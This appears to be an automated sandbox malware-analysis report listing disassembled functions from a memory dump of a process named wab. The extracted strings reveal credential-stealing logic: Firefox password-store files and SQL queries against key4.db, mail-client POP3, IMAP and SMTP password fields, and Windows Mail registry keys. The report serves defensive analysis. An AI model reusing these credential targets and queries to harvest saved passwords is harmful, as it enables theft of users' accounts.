                                                                                                                • _mbscpy.MSVCRT ref: 004028A3
                                                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                • _mbscpy.MSVCRT ref: 0040297B
                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                • memcpy.MSVCRT ref: 0040FE82
                                                                                                                • _mbscpy.MSVCRT ref: 0040FEA4
                                                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                Strings
                                                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                • API String ID: 1428123949-3474136107
                                                                                                                • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2998058495-0
                                                                                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                • API String ID: 2303586283-933021314
                                                                                                                • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                • API String ID: 231171946-2189169393
                                                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                • , xrefs: 00406834
                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 710961058-601624466
                                                                                                                • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                  • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                                                • _mbscpy.MSVCRT ref: 0040F30E
                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                • API String ID: 1613542760-3138536805
                                                                                                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                • API String ID: 1012775001-1343505058
                                                                                                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi
                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                • API String ID: 1439213657-1959339147
                                                                                                                • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00444612
                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                                                • memset.MSVCRT ref: 00444668
                                                                                                                • memset.MSVCRT ref: 0044467C
                                                                                                                • memset.MSVCRT ref: 00444690
                                                                                                                • memset.MSVCRT ref: 004446B6
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                • memcpy.MSVCRT ref: 004446ED
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                • memcpy.MSVCRT ref: 00444729
                                                                                                                • memcpy.MSVCRT ref: 0044473B
                                                                                                                • _mbscpy.MSVCRT ref: 00444812
                                                                                                                • memcpy.MSVCRT ref: 00444843
                                                                                                                • memcpy.MSVCRT ref: 00444855
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                • String ID: salu
                                                                                                                • API String ID: 3691931180-4177317985
                                                                                                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 2449869053-232097475
                                                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                                                • _mbscpy.MSVCRT ref: 00443B79
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                Strings
                                                                                                                • Salt, xrefs: 00443BA7
                                                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
